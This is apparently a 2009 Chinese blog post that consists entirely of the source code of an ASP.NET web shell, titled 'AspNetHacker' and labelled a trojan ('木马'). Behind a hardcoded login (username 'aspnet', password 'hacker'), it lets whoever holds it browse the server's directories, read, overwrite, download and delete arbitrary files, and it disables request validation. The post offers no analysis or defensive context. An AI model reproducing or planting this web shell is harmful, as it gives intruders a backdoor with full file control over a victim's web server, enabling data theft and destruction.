随笔 - 1330  文章 - 1  评论 - 376  0

 

<%@ Page Language="C#" Debug="true" ValidateRequest="false"%>
<%@ Import Namespace="System.IO" %>
<script runat="server">
    
string NewLine;
    
string NowPath = "";
    
string NowFile = "";
    
protected void Page_Load(object sender, EventArgs e)
    {
        NewLine 
= Environment.NewLine;
        ShowHeader();
        
string Action = Request.QueryString["action"];
        
if (Action == "chk")
        {
            ChkUser(); 
        }
        NowPath 
=HttpUtility.UrlDecode( Request.QueryString["path"+ "");
        NowFile 
= HttpUtility.UrlDecode(Request.QueryString["file"+ "");        
        
if (Session["aspnet"== null || Session["aspnet"].ToString() != "hacker")
        {
            ShowLog();
            ShowFooter();
        }
        
switch (Action)
        {
            
case "up":
                NowFile 
= HttpUtility.UrlDecode(Request.Form["file"+ "");
                UpFile();
                
break;
            
case "del":
                DelFile();
                
break;
            
case "down":
                DownLoadFile();
                
break;
            
case "sf":
                ShowFileInfo();
                ShowFooter();
                
break;
        }
        ShowDictionarys();
        ShowFooter();
    }
    
private void DelFile()
    {
        
if (File.Exists(NowFile))
        {
            
try
            {
                File.Delete(NowFile);
            }
            
catch (Exception e)
            {
                Response.Write(
"<script>alert('删除失败:"+e.Message+"!');history.back();</" + "script>");
                Response.End();
            }
        } 
    }
    
private void ShowFileInfo()
    {
        
if (File.Exists(NowFile))
        {
            
try
            {
                Response.Write(
"<div align='center'><form method='post' action='?action=up&path="+HttpUtility.UrlEncode(NowPath)+"'>");
                Response.Write(
"<input type='hidden' value='" + HttpUtility.UrlEncode(NowFile) + "' name='file'/>");  
                Stream s 
= File.Open(NowFile, FileMode.Open, FileAccess.Read);
                Encoding encoding 
= GetFileEncoding(s);//获取文件编码
                Response.Write("<input type='hidden' value='"+encoding.CodePage+"' name='encoding'/>");                
                s.Position 
= 0;
                Response.Write(
"<textarea name='ct' style='width:650px;height=500px'>");
                StreamReader sr 
= new StreamReader(s, encoding);
                Response.Write(sr.ReadToEnd());
                sr.Close();
                s.Close();
                Response.Write(
"</textarea><br/><input type='submit' value='修改'/></form></div>"); 
            }
            
catch (Exception e)
            {
                Response.Write(
"<script>alert('读取失败:" + e.Message + "!');history.back();</" + "script>");
                Response.End();
            }
        } 
        
else
        {
            Response.Write(
"<script>alert('文件不存在!');history.back();</" + "script>");
            Response.End();
        }
    }
    
private void UpFile()
    {
        
if (File.Exists(NowFile))
        {
            
try
            {
                Encoding encoding 
= Encoding.GetEncoding(int.Parse(Request.Form["encoding"]));
                StreamWriter sw 
= new StreamWriter(NowFile, false, encoding);
                sw.Write(Request.Form[
"ct"]);
                sw.Close();
                Response.Write(
"<script>alert('保存成功!');</" + "script>");
            }
            
catch (Exception e)
            {
                Response.Write(
"<script>alert('保存失败:" + e.Message + "!');history.back();</" + "script>");
                Response.End();
            }
        }
        
else
        {
            Response.Write(
"<script>alert('文件不存在!');history.back();</" + "script>");
            Response.End();
        }
    }
    
private void DownLoadFile()
    {
        
if (File.Exists(NowFile))
        {
            
try
            {
                
string Ext = Path.GetExtension(NowFile).Replace(".""");
                
string Name = Path.GetFileName(NowFile);
                
string Mime = "";
                
switch (Ext)
                { 
                    
case "jpg":
                        Mime 
= "image/" + Ext;
                        
break;
                    
case "png":
                        Mime 
= "image/" + Ext;
                        
break;
                    
case "gif":
                        Mime 
= "image/" + Ext;
                        
break;
                    
case "bmp":
                        Mime 
= "application/x-MS-bmp";
                        
break;
                    
case "ico":
                        Mime 
= "application/octet-stream";
                        
break;
                    
case "rar":
                        Mime 
= "application/x-rar-compressed";
                        
break;
                    
case "html":
                        Mime 
= "text/html";
                        
break;
                    
case "htm":
                        Mime 
= "text/htm";
                        
break;
                    
case "asp":
                        Mime 
= "text/plain";
                        
break;
                    
case "aspx":
                        Mime 
= "text/plain";
                        
break;
                    
case "jsp":
                        Mime 
= "text/plain";
                        
break;
                    
case "php":
                        Mime 
= "text/plain";
                        
break;
                    
case "do":
                        Mime 
= "text/plain";
                        
break;   
                    
case "txt":
                        Mime 
= "text/plain";
                        
break;
                    
default:
                        Mime 
= "application/octet-stream";
                        
break;
                }
                Response.Clear();
                Response.ContentType 
= Mime;
                Response.AddHeader(
"Content-Disposition""attachment;filename=\"" + Name + "\"");
                Response.WriteFile(NowFile);
                Response.Flush();
            }
            
catch (Exception e)
            {
                Response.Write(
"<script>alert('文件下载失败:"+e.Message+"!');self.close();</" + "script>");
                Response.End();
            } 
        }
        
else
        {
            Response.Write(
"<script>alert('文件不存在!');self.close();</" + "script>");
            Response.End();
        }
    }
    
private void ChkUser()
    {
        
if (Request.Form["un"== "aspnet" && Request.Form["pwd"== "hacker")
        {
            Session[
"aspnet"= "hacker";            
        }
        
else
        {
            Response.Write(
"<script>alert('用户名或者密码出错!');history.back();</"+"script>");
            Response.End();
        }
    }
    
private void ShowTable(bool IsHeader)
    {
        
if (IsHeader)
        {
            Response.Write(NewLine
+"<script>function Reload(path){window.location='?path='+path;}"+NewLine
                
+ "function DelConfirm(path,file){if(confirm('确认删除!?')){window.location='?action=del&path='+path+'&file='+file;}}" + NewLine
                
+ "function DownLoad(path){window.open('?action=down&file='+path);}</" + "script>" + NewLine);
            Response.Write(
"<table border='1px' bordercolor='black' style='width:600px;' align='center'><tr>" + NewLine); 
        }
        
else
        {
            Response.Write(
"</tr></table>"); 
        } 
    }
    
private void ShowDictionarys()
    {
        ShowTable(
true);       
        
try
        {
            
            DirectoryInfo DirInfo;
            
if (NowPath == "")
                DirInfo 
= new DirectoryInfo(Server.MapPath(""));
            
else
                DirInfo 
= new DirectoryInfo(NowPath);
            DirectoryInfo[] Dirs 
= DirInfo.GetDirectories();
            Response.Write(
"<td width='30%' valign='top'>");
            Response.Write(
"<div title='双击返回' ondblclick=\"Reload('" + HttpUtility.UrlEncode(DirInfo.Parent.FullName) + "')\">返回上级目录</div>");
            
foreach (DirectoryInfo d in Dirs)
            {
                Response.Write(
"<div title='双击进入' ondblclick=\"Reload('" + HttpUtility.UrlEncode(d.FullName) + "')\">" + d.Name + "</div>"); 
            }
            Response.Write(
"</td>");
            ShowFiles(DirInfo.GetFiles());                    
        }
        
catch
        {
            Response.Write(
"<script>alert('没有权限访问这个目录!');history.back();</" + "script>");
            Response.End();
        }
    }
    
private void ShowFiles(FileInfo[] Files)
    {
        Response.Write(
"<td width='70%' valign='top'>");
        Response.Write(
"<table width='100%'>");
        Response.Write(
"<tr><td width='70%'><b>文件名称</b></td><td width='30%' align='center'><b>操作</b></td></tr>");
        Response.Write(
"<tr><td height='2px' colspan='2' style='background-color:black'></td></tr>");
        
string Ext = "";
        
foreach (FileInfo fi in Files)
        {
            Ext 
= fi.Extension.ToLower().Replace(".""");
            Response.Write(
"<tr><td title=\"类型:" + Ext + NewLine
                + "大小:" + Math.Ceiling((double)fi.Length / (double)1024+ "kb" + NewLine
                
+ "最后修改:" + fi.LastWriteTime.ToString() + "\"><font color='red'>" +fi.Name+
                "</font></td>");                           
            Response.Write(
"<td>");
            
if (Ext != "jpg" && Ext != "gif" && Ext != "bmp" && Ext != "ico" && Ext != "png"&&Ext!="rar")
                Response.Write(
"<a href='?action=sf&path="+HttpUtility.UrlEncode(NowPath)+
                    
"&file=" + HttpUtility.UrlEncode(fi.FullName) + "'>编辑</a>&nbsp;&nbsp;");
            Response.Write(
"<a href='#' onclick=\"DownLoad('" + HttpUtility.UrlEncode(fi.FullName) + "')\">下载</a>&nbsp;&nbsp;");
            Response.Write(
"<a href='#' onclick=\"DelConfirm('"+HttpUtility.UrlEncode(NowPath)+
                "','"+HttpUtility.UrlEncode( fi.FullName)+"')\">删除</a></td></tr>");   
        }
        Response.Write(
"</table>");
        Response.Write(
"</td>");
        ShowTable(
false);
    }
    
private Encoding GetFileEncoding(Stream s)
    {
        Encoding encoding 
= Encoding.Default;
        
try
        {
            
byte[] FirstByte = new byte[2];
            s.Read(FirstByte, 
0, FirstByte.Length);
            
if (FirstByte[0== 239 && FirstByte[1== 187)
                
return Encoding.UTF8;
            
else if (FirstByte[0== 255 && FirstByte[1== 254)
                
return Encoding.Unicode;
            
else if (FirstByte[0== 254 && FirstByte[1== 255)
                
return Encoding.BigEndianUnicode;
        }
        
catch
        { }
        
return encoding;
    }
    
private void ShowHeader()
    {
        Response.Write(
"<html>" + NewLine);
        Response.Write(
"<head>" + NewLine);
        Response.Write(
"<meta http-equiv='content-type'"+
            
" content='text/html;charset=utf-8'/>" + NewLine);
        Response.Write(
"<title>AspNetHacker</title>" + NewLine);
        Response.Write(
"<style>body{font-size:10pt}" + NewLine + "td{font-size:10pt}" + NewLine
            
+ "a{font-size:10pt}" + "</style>");
        Response.Write(
"</head><body>" + NewLine);
    }
    
private void ShowLog()
    {
        Response.Write(
"<script>function check(f){"+NewLine+"if(f.un.value==''){alert('用户名不能为空!');f.un.focus();return false;}"+
            NewLine
+"if(f.pwd.value==''){alert('密码不能为空!');f.pwd.focus();return false;}}</" + "script>" + NewLine);
        Response.Write(
"<div align='center'><form method='post' action='?action=chk' onsubmit='return check(this)'>"+NewLine);
        Response.Write(
"用户名:<input type='text' name='un' width='200px'/>"
            
+ NewLine + "<br/>密码:<input type='password' name='pwd' width='200px'/><br/>"+NewLine
            
+"<input type='submit' value='提交'/>");
        Response.Write(
"</div></form>");
    }
    
private void ShowFooter()
    {
        Response.Write(
"<div align='center'>AspNet木马</div></body></html>");
        Response.End();
    }
</script>

 

posted on 2009-07-15 18:09 钱途无梁 阅读(...) 评论(...) 编辑 收藏